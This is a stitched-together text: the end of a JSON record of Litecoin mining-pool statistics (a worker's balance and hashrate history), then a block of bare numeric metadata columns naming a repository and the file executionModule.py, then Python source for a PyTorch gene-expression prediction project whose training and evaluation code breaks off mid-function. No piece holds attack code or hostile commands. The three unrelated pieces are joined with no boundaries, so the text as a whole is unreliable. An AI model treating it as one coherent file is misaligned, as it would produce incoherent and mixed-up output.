"2019-12-01T15:50:00Z": 0, "2019-12-01T16:00:00Z": 0, "2019-12-01T16:10:00Z": 0, "2019-12-01T16:20:00Z": 0, "2019-12-01T16:30:00Z": 0, "2019-12-01T16:40:00Z": 0, "2019-12-01T16:50:00Z": 0, "2019-12-01T17:00:00Z": 0, "2019-12-01T17:10:00Z": 0, "2019-12-01T17:20:00Z": 0, "2019-12-01T17:30:00Z": 0, "2019-12-01T17:40:00Z": 0, 
"2019-12-01T17:50:00Z": 0, "2019-12-01T18:00:00Z": 0, "2019-12-01T18:10:00Z": 0, "2019-12-01T18:20:00Z": 0}},
'/litecoin/holitics' : {"balance": 0.002640930837514650, "hashes_last_day": 2937757630464, "hashes_last_hour": 0, "hashrate": 0, "hashrate_history": {"2019-11-30T19:40:00Z": 372230499, "2019-11-30T19:50:00Z": 272014595, "2019-11-30T20:00:00Z": 300647711, "2019-11-30T20:10:00Z": 200431807, "2019-11-30T20:20:00Z": 286331153, "2019-11-30T20:30:00Z": 229064922, "2019-11-30T20:40:00Z": 229064922, "2019-11-30T20:50:00Z": 314964268, "2019-11-30T21:00:00Z": 272014595, "2019-11-30T21:10:00Z": 229064922, "2019-11-30T21:20:00Z": 143165577, "2019-11-30T21:30:00Z": 164640413, "2019-11-30T21:40:00Z": 243381480, "2019-11-30T21:50:00Z": 114532461, "2019-11-30T22:00:00Z": 186115249, "2019-11-30T22:10:00Z": 171798692, "2019-11-30T22:20:00Z": 229064922, "2019-11-30T22:30:00Z": 293489432, "2019-11-30T22:40:00Z": 314964268, "2019-11-30T22:50:00Z": 214748365, "2019-11-30T23:00:00Z": 200431807, "2019-11-30T23:10:00Z": 257698038, "2019-11-30T23:20:00Z": 28633115, "2019-11-30T23:30:00Z": 0, "2019-11-30T23:40:00Z": 0, "2019-11-30T23:50:00Z": 0, "2019-12-01T00:00:00Z": 0, "2019-12-01T00:10:00Z": 0, "2019-12-01T00:20:00Z": 0, "2019-12-01T00:30:00Z": 0, "2019-12-01T00:40:00Z": 0, "2019-12-01T00:50:00Z": 0, "2019-12-01T01:00:00Z": 0, "2019-12-01T01:10:00Z": 0, "2019-12-01T01:20:00Z": 0, "2019-12-01T01:30:00Z": 0, "2019-12-01T01:40:00Z": 0, "2019-12-01T01:50:00Z": 0, "2019-12-01T02:00:00Z": 0, "2019-12-01T02:10:00Z": 0, "2019-12-01T02:20:00Z": 0, "2019-12-01T02:30:00Z": 0, "2019-12-01T02:40:00Z": 0, "2019-12-01T02:50:00Z": 0, "2019-12-01T03:00:00Z": 0, "2019-12-01T03:10:00Z": 0, "2019-12-01T03:20:00Z": 0, "2019-12-01T03:30:00Z": 0, "2019-12-01T03:40:00Z": 0, "2019-12-01T03:50:00Z": 0, "2019-12-01T04:00:00Z": 0, "2019-12-01T04:10:00Z": 0, "2019-12-01T04:20:00Z": 0, "2019-12-01T04:30:00Z": 0, "2019-12-01T04:40:00Z": 0, "2019-12-01T04:50:00Z": 0, "2019-12-01T05:00:00Z": 0, "2019-12-01T05:10:00Z": 0, "2019-12-01T05:20:00Z": 0, "2019-12-01T05:30:00Z": 0, "2019-12-01T05:40:00Z": 0, 
"2019-12-01T05:50:00Z": 0, "2019-12-01T06:00:00Z": 0, "2019-12-01T06:10:00Z": 0, "2019-12-01T06:20:00Z": 0, "2019-12-01T06:30:00Z": 0, "2019-12-01T06:40:00Z": 0, "2019-12-01T06:50:00Z": 0, "2019-12-01T07:00:00Z": 0, "2019-12-01T07:10:00Z": 0, "2019-12-01T07:20:00Z": 0, "2019-12-01T07:30:00Z": 0, "2019-12-01T07:40:00Z": 0, "2019-12-01T07:50:00Z": 0, "2019-12-01T08:00:00Z": 0, "2019-12-01T08:10:00Z": 0, "2019-12-01T08:20:00Z": 0, "2019-12-01T08:30:00Z": 0, "2019-12-01T08:40:00Z": 0, "2019-12-01T08:50:00Z": 0, "2019-12-01T09:00:00Z": 0, "2019-12-01T09:10:00Z": 0, "2019-12-01T09:20:00Z": 0, "2019-12-01T09:30:00Z": 0, "2019-12-01T09:40:00Z": 0, "2019-12-01T09:50:00Z": 0, "2019-12-01T10:00:00Z": 0, "2019-12-01T10:10:00Z": 0, "2019-12-01T10:20:00Z": 0, "2019-12-01T10:30:00Z": 0, "2019-12-01T10:40:00Z": 0, "2019-12-01T10:50:00Z": 0, "2019-12-01T11:00:00Z": 0, "2019-12-01T11:10:00Z": 0, "2019-12-01T11:20:00Z": 0, "2019-12-01T11:30:00Z": 0, "2019-12-01T11:40:00Z": 0, "2019-12-01T11:50:00Z": 0, "2019-12-01T12:00:00Z": 0, "2019-12-01T12:10:00Z": 0, "2019-12-01T12:20:00Z": 0, "2019-12-01T12:30:00Z": 0, "2019-12-01T12:40:00Z": 0, "2019-12-01T12:50:00Z": 0, "2019-12-01T13:00:00Z": 0, "2019-12-01T13:10:00Z": 0, "2019-12-01T13:20:00Z": 0, "2019-12-01T13:30:00Z": 0, "2019-12-01T13:40:00Z": 0, "2019-12-01T13:50:00Z": 0, "2019-12-01T14:00:00Z": 0, "2019-12-01T14:10:00Z": 0, "2019-12-01T14:20:00Z": 0, "2019-12-01T14:30:00Z": 0, "2019-12-01T14:40:00Z": 0, "2019-12-01T14:50:00Z": 0, "2019-12-01T15:00:00Z": 0, "2019-12-01T15:10:00Z": 0, "2019-12-01T15:20:00Z": 0, "2019-12-01T15:30:00Z": 0, "2019-12-01T15:40:00Z": 0, "2019-12-01T15:50:00Z": 0, "2019-12-01T16:00:00Z": 0, "2019-12-01T16:10:00Z": 0, "2019-12-01T16:20:00Z": 0, "2019-12-01T16:30:00Z": 0, "2019-12-01T16:40:00Z": 0, "2019-12-01T16:50:00Z": 0, "2019-12-01T17:00:00Z": 0, "2019-12-01T17:10:00Z": 0, "2019-12-01T17:20:00Z": 0, "2019-12-01T17:30:00Z": 0, "2019-12-01T17:40:00Z": 0, "2019-12-01T17:50:00Z": 0, "2019-12-01T18:00:00Z": 0, 
"2019-12-01T18:10:00Z": 0, "2019-12-01T18:20:00Z": 0, "2019-12-01T18:30:00Z": 0, "2019-12-01T18:40:00Z": 0, "2019-12-01T18:50:00Z": 0, "2019-12-01T19:00:00Z": 0, "2019-12-01T19:10:00Z": 0, "2019-12-01T19:20:00Z": 0, "2019-12-01T19:30:00Z": 0}, "hashrate_history_local": {"2019-11-30T19:40:00Z": 0, "2019-11-30T19:50:00Z": 0, "2019-11-30T20:00:00Z": 0, "2019-11-30T20:10:00Z": 0, "2019-11-30T20:20:00Z": 0, "2019-11-30T20:30:00Z": 0, "2019-11-30T20:40:00Z": 0, "2019-11-30T20:50:00Z": 0, "2019-11-30T21:00:00Z": 0, "2019-11-30T21:10:00Z": 0, "2019-11-30T21:20:00Z": 0, "2019-11-30T21:30:00Z": 0, "2019-11-30T21:40:00Z": 0, "2019-11-30T21:50:00Z": 0, "2019-11-30T22:00:00Z": 0, "2019-11-30T22:10:00Z": 0, "2019-11-30T22:20:00Z": 0, "2019-11-30T22:30:00Z": 0, "2019-11-30T22:40:00Z": 0, "2019-11-30T22:50:00Z": 0, "2019-11-30T23:00:00Z": 0, "2019-11-30T23:10:00Z": 0, "2019-11-30T23:20:00Z": 0, "2019-11-30T23:30:00Z": 0, "2019-11-30T23:40:00Z": 0, "2019-11-30T23:50:00Z": 0, "2019-12-01T00:00:00Z": 0, "2019-12-01T00:10:00Z": 0, "2019-12-01T00:20:00Z": 0, "2019-12-01T00:30:00Z": 0, "2019-12-01T00:40:00Z": 0, "2019-12-01T00:50:00Z": 0, "2019-12-01T01:00:00Z": 0, "2019-12-01T01:10:00Z": 0, "2019-12-01T01:20:00Z": 0, "2019-12-01T01:30:00Z": 0, "2019-12-01T01:40:00Z": 0, "2019-12-01T01:50:00Z": 0, "2019-12-01T02:00:00Z": 0, "2019-12-01T02:10:00Z": 0, "2019-12-01T02:20:00Z": 0, "2019-12-01T02:30:00Z": 0, "2019-12-01T02:40:00Z": 0, "2019-12-01T02:50:00Z": 0, "2019-12-01T03:00:00Z": 0, "2019-12-01T03:10:00Z": 0, "2019-12-01T03:20:00Z": 0, "2019-12-01T03:30:00Z": 0, "2019-12-01T03:40:00Z": 0, "2019-12-01T03:50:00Z": 0, "2019-12-01T04:00:00Z": 0, "2019-12-01T04:10:00Z": 0, "2019-12-01T04:20:00Z": 0, "2019-12-01T04:30:00Z": 0, "2019-12-01T04:40:00Z": 0, "2019-12-01T04:50:00Z": 0, "2019-12-01T05:00:00Z": 0, "2019-12-01T05:10:00Z": 0, "2019-12-01T05:20:00Z": 0, "2019-12-01T05:30:00Z": 0, "2019-12-01T05:40:00Z": 0, "2019-12-01T05:50:00Z": 0, "2019-12-01T06:00:00Z": 0, "2019-12-01T06:10:00Z": 0, 
"2019-12-01T06:20:00Z": 0, "2019-12-01T06:30:00Z": 0, "2019-12-01T06:40:00Z": 0, "2019-12-01T06:50:00Z": 0, "2019-12-01T07:00:00Z": 0, "2019-12-01T07:10:00Z": 0, "2019-12-01T07:20:00Z": 0, "2019-12-01T07:30:00Z": 0, "2019-12-01T07:40:00Z": 0, "2019-12-01T07:50:00Z": 0, "2019-12-01T08:00:00Z": 0, "2019-12-01T08:10:00Z": 0, "2019-12-01T08:20:00Z": 0, "2019-12-01T08:30:00Z": 0, "2019-12-01T08:40:00Z": 0, "2019-12-01T08:50:00Z": 0, "2019-12-01T09:00:00Z": 0, "2019-12-01T09:10:00Z": 0, "2019-12-01T09:20:00Z": 0, "2019-12-01T09:30:00Z": 0, "2019-12-01T09:40:00Z": 0, "2019-12-01T09:50:00Z": 0, "2019-12-01T10:00:00Z": 0, "2019-12-01T10:10:00Z": 0, "2019-12-01T10:20:00Z": 0, "2019-12-01T10:30:00Z": 0, "2019-12-01T10:40:00Z": 0, "2019-12-01T10:50:00Z": 0, "2019-12-01T11:00:00Z": 0, "2019-12-01T11:10:00Z": 0, "2019-12-01T11:20:00Z": 0, "2019-12-01T11:30:00Z": 0, "2019-12-01T11:40:00Z": 0, "2019-12-01T11:50:00Z": 0, "2019-12-01T12:00:00Z": 0, "2019-12-01T12:10:00Z": 0, "2019-12-01T12:20:00Z": 0, "2019-12-01T12:30:00Z": 0, "2019-12-01T12:40:00Z": 0, "2019-12-01T12:50:00Z": 0, "2019-12-01T13:00:00Z": 0, "2019-12-01T13:10:00Z": 0, "2019-12-01T13:20:00Z": 0, "2019-12-01T13:30:00Z": 0, "2019-12-01T13:40:00Z": 0, "2019-12-01T13:50:00Z": 0, "2019-12-01T14:00:00Z": 0, "2019-12-01T14:10:00Z": 0, "2019-12-01T14:20:00Z": 0, "2019-12-01T14:30:00Z": 0, "2019-12-01T14:40:00Z": 0, "2019-12-01T14:50:00Z": 0, "2019-12-01T15:00:00Z": 0, "2019-12-01T15:10:00Z": 0, "2019-12-01T15:20:00Z": 0, "2019-12-01T15:30:00Z": 0, "2019-12-01T15:40:00Z": 0, "2019-12-01T15:50:00Z": 0, "2019-12-01T16:00:00Z": 0, "2019-12-01T16:10:00Z": 0, "2019-12-01T16:20:00Z": 0, "2019-12-01T16:30:00Z": 0, "2019-12-01T16:40:00Z": 0, "2019-12-01T16:50:00Z": 0, "2019-12-01T17:00:00Z": 0, "2019-12-01T17:10:00Z": 0, "2019-12-01T17:20:00Z": 0, "2019-12-01T17:30:00Z": 0, "2019-12-01T17:40:00Z": 0, "2019-12-01T17:50:00Z": 0, "2019-12-01T18:00:00Z": 0, "2019-12-01T18:10:00Z": 0, "2019-12-01T18:20:00Z": 0, "2019-12-01T18:30:00Z": 0, 
"2019-12-01T18:40:00Z": 0, "2019-12-01T18:50:00Z": 0, "2019-12-01T19:00:00Z": 0, "2019-12-01T19:10:00Z": 0, "2019-12-01T19:20:00Z": 0, "2019-12-01T19:30:00Z": 0}, "last": {}, "local_hash": 0, "paid": 0, "payout_history": [], "stale_hashes_rejected_last_day": 0, "stale_hashes_rejected_last_hour": 0, "value": 0.002640930837514650, "value_change": 0E-18, "value_last_day": 0.001432999219104999, "worker_length": 1, "worker_length_online": 0, "workers": [["001", 272014595, 0, 0, 2937757630464, 0, "2019-11-30T23:20:44.909751Z", False, 0]]}
}
| 2,788.5
| 8,515
| 0.642101
| 3,557
| 16,731
| 3.012932
| 0.028114
| 0.195204
| 0.387422
| 0.427358
| 0.953905
| 0.929924
| 0.929924
| 0.925632
| 0.925632
| 0.925632
| 0
| 0.593373
| 0.072799
| 16,731
| 6
| 8,516
| 2,788.5
| 0.097467
| 0
| 0
| 0
| 0
| 0
| 0.713722
| 0.01279
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 14
|
79b7120f280e769926784cce029618e73e099d1b
| 68,162
|
py
|
Python
|
executionModule.py
|
RoyRGitHub/STDL-Project
|
bae689ea12682bb60f6e1ed19677d2ae2238cda7
|
[
"Unlicense"
] | 1
|
2020-10-05T09:11:14.000Z
|
2020-10-05T09:11:14.000Z
|
executionModule.py
|
RoyRGitHub/STDL-Project
|
bae689ea12682bb60f6e1ed19677d2ae2238cda7
|
[
"Unlicense"
] | null | null | null |
executionModule.py
|
RoyRGitHub/STDL-Project
|
bae689ea12682bb60f6e1ed19677d2ae2238cda7
|
[
"Unlicense"
] | null | null | null |
import torch
from torch.utils.data import Dataset, DataLoader
from torch.utils.data import random_split
import torchvision
import numpy as np
import pandas as pd
from sklearn.decomposition import NMF
from deepNetworkArchitechture import *
from projectUtilities import *
import matplotlib
matplotlib.use('Agg') # TODO: delete later if you want to use plot in jupyter notebook
from matplotlib import pyplot as plt
import seaborn as sns
from numpy import savetxt
###def train_prediction_model(model_to_train, ds_train, dl_train, loss_fn, optimizer, num_of_epochs_wanted, max_alowed_number_of_batches, device): ### TODO delete if not needed
def train_prediction_model(model_to_train, ds_train, loss_fn, optimizer, hyperparams, model_name, dataset_name, device):
    '''
    Run the full training loop for a prediction model and return the trained model.

    The dataset is wrapped in a SHUFFLING DataLoader, and training runs for
    hyperparams['num_of_epochs'] epochs. Each epoch is capped at
    hyperparams['max_alowed_number_of_batches'] batches (a speed/accuracy
    trade-off); otherwise every datapoint is used, including the smaller
    leftover batch. The per-epoch mean loss is collected and plotted via
    plot_loss_convergence at the end.
    '''
    print("/ * \ ENTERED train_prediction_model / * \ ")
    # unpack the hyperparameters referenced below
    num_of_epochs = hyperparams['num_of_epochs']
    max_alowed_number_of_batches = hyperparams['max_alowed_number_of_batches']
    net = model_to_train
    # a shuffling dataloader: every epoch iterates the data in a fresh order
    train_loader = DataLoader(ds_train, batch_size=hyperparams['batch_size'],
                              num_workers=hyperparams['num_workers'], shuffle=True)
    # move the model to the GPU when one is available
    if device.type == 'cuda':
        net = net.to(device=device)
    # decide how many batches each epoch will actually process
    batches_per_epoch = len(ds_train) // train_loader.batch_size
    if batches_per_epoch > max_alowed_number_of_batches:
        print(f'NOTE: in order to speed up training (while damaging accuracy) the number of batches per epoch was reduced from {batches_per_epoch} to {max_alowed_number_of_batches}')
        batches_per_epoch = max_alowed_number_of_batches
    elif len(ds_train) % train_loader.batch_size != 0:
        # account for the final, smaller batch the floor division dropped
        batches_per_epoch = batches_per_epoch + 1
    print("****** begin training ******")
    mean_loss_per_epoch = []
    for epoch in range(num_of_epochs):
        print(f'iteration {epoch+1} of {num_of_epochs} epochs')
        batch_iter = iter(train_loader)  # fresh (re-shuffled) iterator every epoch
        epoch_losses = []
        for _ in range(batches_per_epoch):
            batch = next(batch_iter)
            # only the image tensor and the target are used; any further
            # elements in the batch tuple are ignored
            x = batch[0]
            y = batch[1]
            if device.type == 'cuda':
                x = x.to(device=device)
                y = y.to(device=device)
            # forward pass; squeeze so a (N, 1) output matches a (N,) target
            y_pred = net(x).squeeze()
            loss = loss_fn(y_pred, y)
            epoch_losses.append(loss.item())
            # zero stale gradients (they accumulate by default), then backprop
            # and apply the parameter update
            optimizer.zero_grad()
            loss.backward()
            optimizer.step()
            # drop the batch tensors promptly to free GPU memory
            del x, y
        mean_loss_per_epoch.append(np.mean(epoch_losses))
    print(f'finished all epochs ! ') # spaces ARE intended
    print(f'which means, that this model is now trained.')
    print(f'plotting the loss convergence for the training of this model: ')
    plot_loss_convergence(mean_loss_per_epoch, model_name, dataset_name)
    print(" \ * / FINISHED train_prediction_model \ * / ")
    return net
def runExperiment(ds_train : Dataset, ds_test : Dataset, hyperparams, device, model_name, dataset_name):
    '''
    Train a model on `ds_train` and evaluate it on both `ds_train` and `ds_test`.

    The evaluation branch is selected by the prefix of `dataset_name`:
    "single_gene", "k_genes", "NMF" or "AE". Each branch runs the matching
    prediction helper, compares prediction vs. truth against a baseline, and
    saves scatter/color (and for k_genes, heatmap) plots.

    NOTE: in the K genes experiments the matrices are of shape
    (num of samples, k), BUT in NMF and AE the matrices are TRANSPOSED and are
    of shape (num of genes, num of samples).
    '''
    print("\n----- entered function runExperiment -----")
    '''
    prepare model, loss and optimizer instances
    '''
    # create the model
    model = get_model_by_name(name=model_name, dataset=ds_train, hyperparams=hyperparams)
    # create the loss function and optimizer
    loss_fn = torch.nn.MSELoss()
    optimizer = torch.optim.Adam(model.parameters(), lr=hyperparams['learning_rate'])
    '''
    Train the model
    '''
    trained_model = train_prediction_model(model_to_train=model, ds_train=ds_train, loss_fn=loss_fn,
                                           optimizer=optimizer, hyperparams=hyperparams,
                                           model_name=model_name, dataset_name=dataset_name, device=device)
    '''
    Test the model by its type on the train and test datasets, and print comparisons
    NOTE: in the K genes experiments the matrices are of shape (num of samples, k)
    BUT in NMF and AE the matrices are TRANSPOSED and are of shape (num of genes, num of samples)
    '''
    if dataset_name.startswith("single_gene"):
        ## perform on TRAIN data
        print("\n## perform on TRAIN data ##")
        M_truth, M_pred = getSingleDimPrediction(dataset=ds_train, model=trained_model, device=device)
        # baseline: every entry is the TRAIN truth average (`np.full` fills an
        # array of the wanted shape with one value)
        baseline = np.full(shape=M_truth.shape, fill_value=np.average(M_truth))
        compare_matrices(M_truth, M_pred, Baseline=baseline)
        plot_SingleGene_PredAndTrue_ScatterComparison(ds_train, M_pred, M_truth, model_name, dataset_name + ' Train', hyperparams['gene_name'])
        plot_SingleGene_PredAndTrue_ColorVisualisation(ds_train, M_pred, M_truth, model_name, dataset_name + ' Train', hyperparams['gene_name'])
        # perform on TEST data
        print("\n## perform on TEST data ##")
        M_truth_test, M_pred_test = getSingleDimPrediction(dataset=ds_test, model=trained_model, device=device)
        # NOTE: shape of TEST data, filled with TRAIN data avg !!!
        baseline = np.full(shape=M_truth_test.shape, fill_value=np.average(M_truth))
        compare_matrices(M_truth_test, M_pred_test, Baseline=baseline) # NOTE: same baseline as above - the TRAIN baseline
        plot_SingleGene_PredAndTrue_ScatterComparison(ds_test, M_pred_test, M_truth_test, model_name, dataset_name + ' Test', hyperparams['gene_name'])
        plot_SingleGene_PredAndTrue_ColorVisualisation(ds_test, M_pred_test, M_truth_test, model_name, dataset_name + ' Test', hyperparams['gene_name'])
        print("\n## VERIFICATIONS 091020 ##") #TODO: delete later
        # save predictions to a csv file
        savetxt('single_gene_test_pred_from_K_genes_exp.csv', M_pred_test, delimiter=',')
    elif dataset_name.startswith("k_genes"):
        # map the chosen gene's original matrix row index to its position in
        # the reduced (K-gene) train/test matrices
        train_gene_index = ds_train.mapping.index[ds_train.mapping['original_index_from_matrix_dataframe'] == hyperparams['geneRowIndexIn_Reduced_Train_matrix_df']].item()
        test_gene_index = ds_test.mapping.index[ds_test.mapping['original_index_from_matrix_dataframe'] == hyperparams['geneRowIndexIn_Reduced_Test_matrix_df']].item()
        ### perform on TRAIN data ###
        print("\n## perform on TRAIN data ##")
        M_truth, M_pred = getKDimPrediction(dataset=ds_train, model=trained_model, device=device)
        print("matrix comparsions on all K genes ...")
        num_rows = M_truth.shape[0]
        # baseline: each gene's column is its average over all samples,
        # repeated for every sample (row)
        baseline = np.tile(A=np.average(M_truth, axis=0), reps=(num_rows,1))
        compare_matrices(M_truth, M_pred, Baseline=baseline)
        print("results plot & vector comparsions on the chosen single gene ...")
        M_pred_single_gene = M_pred[:,train_gene_index].squeeze()
        M_truth_single_gene = M_truth[:,train_gene_index].squeeze()
        baseline_single_gene = baseline[:,train_gene_index].squeeze()
        compare_matrices(M_truth_single_gene, M_pred_single_gene, Baseline=baseline_single_gene)
        plot_SingleGene_PredAndTrue_ScatterComparison(ds_train, M_pred_single_gene, M_truth_single_gene, model_name, dataset_name + ' Train', hyperparams['gene_name'])
        plot_SingleGene_PredAndTrue_ColorVisualisation(ds_train, M_pred_single_gene, M_truth_single_gene, model_name, dataset_name + ' Train', hyperparams['gene_name'])
        plot_heatmaps(M_pred, M_truth, train_or_test='Train')
        ### perform on TEST data ###
        print("\n## perform on TEST data ##")
        M_truth_test, M_pred_test = getKDimPrediction(dataset=ds_test, model=trained_model, device=device)
        print("matrix comparsions on all K genes ...")
        num_rows = M_truth_test.shape[0]
        # NOTE: baseline averages come from TRAIN data, tiled to TEST shape
        baseline = np.tile(A=np.average(M_truth, axis=0), reps=(num_rows,1))
        compare_matrices(M_truth_test, M_pred_test, Baseline=baseline)
        print("results plot & vector comparsions on the chosen single gene ...")
        M_pred_single_gene = M_pred_test[:,test_gene_index].squeeze()
        M_truth_single_gene = M_truth_test[:,test_gene_index].squeeze()
        baseline_single_gene = baseline[:,test_gene_index].squeeze()
        compare_matrices(M_truth_single_gene, M_pred_single_gene, Baseline=baseline_single_gene)
        plot_SingleGene_PredAndTrue_ScatterComparison(ds_test, M_pred_single_gene, M_truth_single_gene, model_name, dataset_name + ' Test', hyperparams['gene_name'])
        plot_SingleGene_PredAndTrue_ColorVisualisation(ds_test, M_pred_single_gene, M_truth_single_gene, model_name, dataset_name + ' Test', hyperparams['gene_name'])
        plot_heatmaps(M_pred_test, M_truth_test, train_or_test='Test')
    elif dataset_name.startswith("NMF"):
        # here the row indices address the full-dimension (genes x samples) matrices directly
        train_gene_index = hyperparams['geneRowIndexIn_Reduced_Train_matrix_df']
        test_gene_index = hyperparams['geneRowIndexIn_Reduced_Test_matrix_df']
        ### perform on TRAIN data ###
        print("\n## perform on TRAIN data ##")
        M_truth, M_pred = getFullDimsPrediction_with_NMF_DS(dataset=ds_train, W=ds_train.W, model=trained_model, device=device)
        # train-error comparisons:  M_truth ~ M_fast_reconstruction ~ M_pred
        #                        orig_matrix ~     W * H           ~ W * H_pred
        print("matrix comparsions on all genes ...")
        M_fast_reconstruction = np.matmul(ds_train.W, ds_train.H)
        compare_matrices(M_truth, M_pred, Baseline=M_fast_reconstruction)
        # prepare for the plots of the chosen gene:
        print("results plot & vector comparsions on the chosen single gene ...")
        M_pred_single_gene = M_pred[train_gene_index,:].transpose().squeeze()
        M_truth_single_gene = M_truth[train_gene_index,:].transpose().squeeze()
        M_fast_rec_single_gene = M_fast_reconstruction[train_gene_index,:].transpose().squeeze()
        compare_matrices(M_truth_single_gene, M_pred_single_gene, Baseline=M_fast_rec_single_gene)
        # plot comparisons of M_pred and M_truth
        plot_SingleGene_PredAndTrue_ScatterComparison(ds_train, M_pred_single_gene, M_truth_single_gene, model_name, dataset_name + ' Train', hyperparams['gene_name'])
        plot_SingleGene_PredAndTrue_ColorVisualisation(ds_train, M_pred_single_gene, M_truth_single_gene, model_name, dataset_name + ' Train', hyperparams['gene_name'])
        # plot comparisons of M_fast_rec and M_truth
        plot_SingleGene_PredAndTrue_ScatterComparison(ds_train, M_fast_rec_single_gene, M_truth_single_gene, 'fast_rec', dataset_name + ' Train', hyperparams['gene_name'])
        plot_SingleGene_PredAndTrue_ColorVisualisation(ds_train, M_fast_rec_single_gene, M_truth_single_gene, 'fast_rec', dataset_name + ' Train', hyperparams['gene_name'])
        ### perform on TEST data ###
        print("\n## perform on TEST data ##")
        # NOTE(review): W from the TRAIN dataset is reused for the test
        # reconstruction — presumably intentional (shared basis); confirm
        M_truth_test, M_pred_test = getFullDimsPrediction_with_NMF_DS(dataset=ds_test, W=ds_train.W, model=trained_model, device=device)
        # test-error comparisons:  M_truth ~ M_pred
        #                       orig_matrix ~ W * H_pred
        print("matrix comparsions on all genes ...")
        num_cols = M_truth_test.shape[1]
        # NOTE: this is on TRAIN DATA !!! each gene's row is its TRAIN average,
        # tiled across all TEST samples (reshape turns the row into a column)
        baseline = np.tile(A=np.average(M_truth, axis=1).reshape(-1,1), reps=(1,num_cols))
        compare_matrices(M_truth_test, M_pred_test, Baseline=baseline)
        # prepare for the plots of the chosen gene:
        print("results plot & vector comparsions on the chosen single gene ...")
        M_pred_single_gene = M_pred_test[test_gene_index, :].transpose().squeeze()
        M_truth_single_gene = M_truth_test[test_gene_index, :].transpose().squeeze()
        baseline_single_gene = baseline[test_gene_index, :].squeeze()
        compare_matrices(M_truth_single_gene, M_pred_single_gene, Baseline=baseline_single_gene)
        # plot comparisons of M_pred and M_truth
        plot_SingleGene_PredAndTrue_ScatterComparison(ds_test, M_pred_single_gene, M_truth_single_gene, model_name, dataset_name + ' Test', hyperparams['gene_name'])
        plot_SingleGene_PredAndTrue_ColorVisualisation(ds_test, M_pred_single_gene, M_truth_single_gene, model_name, dataset_name + ' Test', hyperparams['gene_name'])
    elif dataset_name.startswith("AE"):
        train_gene_index = hyperparams['geneRowIndexIn_Reduced_Train_matrix_df']
        test_gene_index = hyperparams['geneRowIndexIn_Reduced_Test_matrix_df']
        ### perform on TRAIN data ###
        print("\n## perform on TRAIN data ##")
        M_truth, M_pred = getFullDimsPrediction_with_AE_DS(dataset=ds_train, AEnet=ds_train.autoEncoder, model=trained_model, device=device)
        # train-error comparisons:  M_truth ~ M_fast_reconstruction ~ M_pred
        #                        orig_matrix ~ Decode(Encode(M))    ~ Decode(Predict(X))
        M_fast_reconstruction = getAutoEncoder_M_fast_reconstruction(dataset=ds_train, model=trained_model, device=device)
        print("matrix comparsions on all genes ...")
        compare_matrices(M_truth, M_pred, Baseline=M_fast_reconstruction)
        # prepare for the plots of the chosen gene:
        print("results plot & vector comparsions on the chosen single gene ...")
        M_pred_single_gene = M_pred[train_gene_index,:].transpose().squeeze()
        M_truth_single_gene = M_truth[train_gene_index,:].transpose().squeeze()
        M_fast_rec_single_gene = M_fast_reconstruction[train_gene_index,:].transpose().squeeze()
        compare_matrices(M_truth_single_gene, M_pred_single_gene, Baseline=M_fast_rec_single_gene)
        # plot comparisons of M_pred and M_truth
        plot_SingleGene_PredAndTrue_ScatterComparison(ds_train, M_pred_single_gene, M_truth_single_gene, model_name, dataset_name + ' Train', hyperparams['gene_name'])
        plot_SingleGene_PredAndTrue_ColorVisualisation(ds_train, M_pred_single_gene, M_truth_single_gene, model_name, dataset_name + ' Train', hyperparams['gene_name'])
        # plot comparisons of M_fast_rec and M_truth
        plot_SingleGene_PredAndTrue_ScatterComparison(ds_train, M_fast_rec_single_gene, M_truth_single_gene, 'fast_rec', dataset_name + ' Train', hyperparams['gene_name'])
        plot_SingleGene_PredAndTrue_ColorVisualisation(ds_train, M_fast_rec_single_gene, M_truth_single_gene, 'fast_rec', dataset_name + ' Train', hyperparams['gene_name'])
        ### perform on TEST data ###
        print("\n## perform on TEST data ##")
        # NOTE(review): the TRAIN autoencoder is reused on the TEST dataset — confirm
        M_truth_test, M_pred_test = getFullDimsPrediction_with_AE_DS(dataset=ds_test, AEnet=ds_train.autoEncoder, model=trained_model, device=device)
        # test-error comparisons:  M_truth ~ M_pred
        print("matrix comparsions on all genes ...")
        num_cols = M_truth_test.shape[1]
        # NOTE: this is on TRAIN DATA !!! each gene's row is its TRAIN average,
        # tiled across all TEST samples (reshape turns the row into a column)
        baseline = np.tile(A=np.average(M_truth, axis=1).reshape(-1,1), reps=(1,num_cols))
        compare_matrices(M_truth_test, M_pred_test, Baseline=baseline)
        # prepare for the plots of the chosen gene:
        print("results plot & vector comparsions on the chosen single gene ...")
        M_pred_single_gene = M_pred_test[test_gene_index, :].transpose().squeeze()
        M_truth_single_gene = M_truth_test[test_gene_index, :].transpose().squeeze()
        baseline_single_gene = baseline[test_gene_index, :].squeeze()
        compare_matrices(M_truth_single_gene, M_pred_single_gene, Baseline=baseline_single_gene)
        # plot comparisons of M_pred and M_truth
        plot_SingleGene_PredAndTrue_ScatterComparison(ds_test, M_pred_single_gene, M_truth_single_gene, model_name, dataset_name + ' Test', hyperparams['gene_name'])
        plot_SingleGene_PredAndTrue_ColorVisualisation(ds_test, M_pred_single_gene, M_truth_single_gene, model_name, dataset_name + ' Test', hyperparams['gene_name'])
    # delete unneeded tensors from GPU to save space
    del trained_model
    # goodbye
    print("\n----- finished function runExperiment -----")
    pass
def runExperiment_mandalay(ds_train_list : list, ds_test : Dataset, hyperparams, device, model_name, dataset_name):
    '''
    Train one model sequentially over every dataset in `ds_train_list`, then
    evaluate it on train data and on `ds_test`.

    (1) Trains the model on ALL training data - one train ds at a time,
        carrying the weights forward between datasets.
    (2) Tests the model on the test data.

    NOTE: the LAST element of `ds_train_list` is assumed to be "patient1",
    which is why it is the dataset used for the TRAIN-side evaluation.
    Currently only the "single_gene" experiment is evaluated here.
    '''
    print("\n----- entered function runExperiment_mandalay -----")
    # create the model (sized/configured according to the first train dataset)
    model = get_model_by_name_Mandalay(name=model_name, dataset=ds_train_list[0], hyperparams=hyperparams)
    # create the loss function and optimizer
    loss_fn = torch.nn.MSELoss()
    optimizer = torch.optim.Adam(model.parameters(), lr=hyperparams['learning_rate'])
    # train on each training dataset in turn; the same optimizer state and
    # model weights are reused across datasets
    trained_model = model  # initial assignment
    for index, ds_train in enumerate(ds_train_list):
